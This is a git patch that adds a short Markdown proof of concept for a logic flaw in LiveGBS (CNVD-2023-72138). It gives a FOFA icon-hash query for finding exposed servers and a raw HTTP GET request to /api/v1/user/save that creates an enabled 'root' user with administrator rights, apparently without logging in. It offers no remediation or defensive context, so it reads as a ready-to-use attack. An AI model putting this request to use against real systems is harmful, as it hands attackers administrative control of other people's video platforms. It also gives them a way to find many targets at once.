From 1355c1104857a684604cfc9df0ec4a5682aa9067 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 1 May 2024 13:38:06 +0800 Subject: [PATCH] =?UTF-8?q?Create=20LiveGBS=E5=AD=98=E5=9C=A8=E9=80=BB?= =?UTF-8?q?=E8=BE=91=E7=BC=BA=E9=99=B7=E6=BC=8F=E6=B4=9E(CNVD-2023-72138).?= =?UTF-8?q?md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md diff --git a/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md b/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md new file mode 100644 index 0000000..20b2461 --- /dev/null +++ b/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md @@ -0,0 +1,18 @@ +## LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138) + +## fofa +``` +icon_hash="-206100324" +``` + + +## poc +``` +GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Connection: close + +``` + +![image](https://github.com/wy876/POC/assets/139549762/c77b5b4e-f3c0-4653-82a6-ebd9756f431e)